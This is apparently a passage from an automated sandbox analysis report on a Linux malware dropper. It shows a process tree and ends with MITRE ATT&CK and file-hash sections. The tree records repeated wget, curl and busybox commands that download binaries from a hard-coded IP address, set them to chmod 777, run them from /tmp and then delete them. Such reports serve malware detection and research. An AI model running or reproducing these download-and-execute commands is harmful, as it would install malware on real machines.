- File and Directory Permissions Modification
PID:926 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:927 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:928
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:929
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:931
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:932 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:933 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:934
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:935
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:937
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:938 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:939 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:940
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:941
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:943
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:944 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:945 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:946
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:947
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:949
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:950 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:951 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:952
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:953
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:955
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:956 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:957 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:958
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:959
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:961
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:962 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:963 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:964
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:965
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:967
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:968 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:969 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:970
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:971
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:973
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:974 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:975 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:976
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:977
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:979
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:980 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:981 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:982
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97